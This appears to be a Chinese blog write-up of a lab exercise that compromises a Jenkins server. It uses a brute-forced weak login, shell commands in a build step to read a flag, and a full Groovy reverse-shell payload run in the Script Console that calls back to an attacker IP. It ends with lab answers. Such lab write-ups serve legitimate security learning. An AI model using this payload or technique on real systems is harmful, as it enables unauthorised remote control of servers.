本次通过分析 jenkins 组件学习渗透测试流程,最终通过代码执行漏洞拿到 shell
信息收集
日常扫描,nmap -sV -v ,发现开放 8080 端口
Jenkins是一个独立的开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能
持续集成:简单来说,有时候做项目,各个模块单独测试时都是能用的,但是上线前将所有模块集成到一起之后跑不通了,此时修改就为时晚矣,所以在模块开发时,就尽早将模块整合,持续不断的集成新模块进行测试,尽早发现问题,这是开发过程中项目管理所提倡的一种方法实践
正常开发人员提交代码后要经历-> 检出(从代码库下载代码到本地)-> 打包 ->部署 几个步骤,而有了集成工具,只需要提交,剩下的都可以交由 Jenkins 帮我们去做,直接就能在服务器看到修改
在网上能搜索到很多 Jenkins (👉Jenkins-w3cschool) 的公开漏洞,但是我们并不清楚该应用具体的版本信息,如果要有该应用所有的漏洞的一键综合利用工具就好了,可惜没找到😏
弱口令
我个人是十分讨厌弱口令这个东西的,只看管理员的安全意识,回报率低
暴破后,根据 Length 排序,账号密码为 root:password
右下角可以看到版本为 2.289.1 ,首先可以熟悉一下它的功能,由于英语实在不好,装了 chrome ,翻译方便一点
功能分析
我们在此阶段的目的是了解应用程序有哪些接口,哪里能控制输入,输入如何处理,结果如何输出…毕竟很大一部分漏洞都是由于不安全的输入引起的,我们关注的重点也是能否利用,而不是真的精通软件的使用
说明文档:https://www.jenkins.io/doc/book/using/
搜索公开的漏洞复现也是比较省力的利用方式 👉cve搜索 ,并不是特别全
在 msf 中有 13 条相关脚本 search jenkins
也可以在搜索引擎搜索 jenkins 漏洞并尝试复现
我们的目的是能访问目标主机的 flag,当然不是所有的漏洞都适合这个场景,比取消项目构建,触发LDAP查询,用户枚举等等,比较合适的就是文件包含&命令执行&代码执行漏洞,最好是直接获取shell的那种,而且有的漏洞没有分析没有利用方式或工具,别说没工具就算有工具都不一定会用,更大可能连是什么漏洞都看不懂…
当然,本次不会尝试去复现漏洞
搜索
search搜索功能 :一般是接收参数拼接 sql 语句,进行数据库查询,并将结果返回到前端页面,在 pikachu 靶场接触过,因为是在前端页面显示,所以也可以测试 xss
添加文本
导航条第二个就是用户管理功能
status:显示用户角色 ID,还可以添加描述,描述的数据会输出到页面,<div> 标签包裹,测试 xss,但是并没有弹窗啊,我们翻阅说明文档,发现它使用了 Content Security Policy(CSP) 内容安全策略,这是专门为了防止 XSS 注入的,没有看到响应头或 meta 标签有相应设置,看源码是符号被转义了
摘自阮一峰博客:
CSP 的实质就是白名单制度,开发者明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单。它的实现和执行全部由浏览器完成,开发者只需提供配置。
CSP 大大增强了网页的安全性。攻击者即使发现了漏洞,也没法注入脚本,除非还控制了一台列入了白名单的可信主机
不仅可以限制各种资源如 js脚本、图片等的加载,也可以限制 url 的引用,当然,CSP 也不是万能的,可以在某些情况下被绕过,如 👉我的CSP绕过思路及总结-先知社区
姓名配置
build 选项应该是先在其他地方配置之后才能在这里操作 ,先略过 ,看configure
改名字的地方,名字这种信息应该会在数据库存储,然后在前端页面显示,也是涉及到 sql、 xss这两个漏洞
描述就不说了,和刚才一样
api令牌
jenkins 的 api 令牌
这个令牌的作用是调用 api 时方便身份验证的,如果使用账号密码被认为是不安全的,这些令牌的生成过程中我们能替换吗?身份认证相关的功能存在越权的可能比较大吧
下面的几个就不介绍了,看过了几个模模糊糊有一些套路了,感觉这个功能没什么值得看,当然这种东西都是靠个人水平的,有什么我也看不出来
ssh公钥
ssh 公钥主要是免密登录使用,和api 令牌同样是为了安全与方便
SSH 密钥登录分为以下的步骤
预备步骤,客户端通过 ssh-keygen 生成自己的公钥和私钥
第一步,手动将客户端的公钥放入远程服务器的指定位置
第二步,客户端向服务器发起 SSH 登录的请求
build
my views 和主界面差不多,先前在翻阅资料时,都会提到构建 build 功能,我们点进去 Groovy Script ,有一个 workspace 文件夹,这个文件夹就是存放项目代码的
同样的,我们点击主页面 New item 新建一个项目,输入名字,选择项目类型,随便选第一个自由风格项目,确认
General 部分是项目的基本配置
Source Code Management 是源代码管理,这种直接执行代码的环境感觉非常不安全,应该是都在沙箱环境,但是也有绕过的一些情况
Build Triggers 构建触发器,意思是在什么条件触发构建任务,比如提供一个接口远程构建,或者定时构建,或者代码更改时构建等等
Build Enviroment 构建环境,一些配置选项,比如每次构建删除旧代码等
Build ,Execute shell 就是执行 shell 命令,我们可以尝试写一个 whoami 执行
Post-build Actions 就是构建后的操作,比如生成报告
Build Now 然后乱点一通,在点进像是太阳图标的东西后,发现 shell 命令的输出结果
node
在左下角 Build Executor Status 有一个构建执行器动态,这是 jenkins 的架构方式
Master/Slave相当于Server和agent的概念。Master提供web接口让用户来管理job和slave,job可以运行在master本机或者被分配到slave上运行。一个master可以关联多个slave用来为不同的job或相同的job的不同配置来服务
master 一般就是 jenkins 的服务器,里面有一个 Script Console 脚本控制台功能,可以写 groovy 脚本
其它的暂时没什么了,看不懂高级用法
命令执行
在 Execute shell 处添加命令查看 flag ,ls -a
ls -a
.
..
我们到根目录下查看,怎么改自己研究吧,很简单,点点就行
cd /root
ls -a
cat flag.txt
代码执行与反弹shell
反弹shell
groovy 是一种 java 扩展语言,java 我们大致了解过皮毛,可以在idea新建项目,经过简单调整格式,本地测试可以运行,String cmd 是 shell 模式,在 win 下是 cmd.exe ,在linux下是/bin/bash
String host="10.10.16.6";
int port=8000;
String cmd="cmd.exe";
//ProcessBuilder创建操作系统进程
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
我们在攻击机使用 nc 监听端口,等待目标机器建立连接获取 shell ,这个是说将目标机器的执行结果发送到攻击机上
在靶场脚本控制台执行,获得了 shell
不知道为什么是这样没有前面的类似的盘符路径什么的,但是也不影响
关于payload
在上面的 payload 中使用了 socket 连接,所谓socket连接,是指网络上的两个程序通过一个双向的通信连接实现数据的交换,这个连接的一端称为一个socket
Server 端 Listen 监听某个端口是否有连接请求
Client 端向 Server 端发出连接请求
Server 端向 Client 端发回 Accept 接受消息 这样一个连接就建立起来了
Server 端和 Client 端都可以通过 Send,Write 等方法与对方通信
所以才可以实现命令与结果的互相传递吧
创建 Socket
打开连接到 Socket 的输入输出出流
按照一定的协议对 Socket 进行读/写操作
关闭 Socket
答案
Common Vulnerabilities and Exposures
confidentiality, integrity, availability
Jetty 9.4.39.v20210325
2.289.1
Groovy
cmd.exe
ifconfig
-u
reverse shell
3134
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
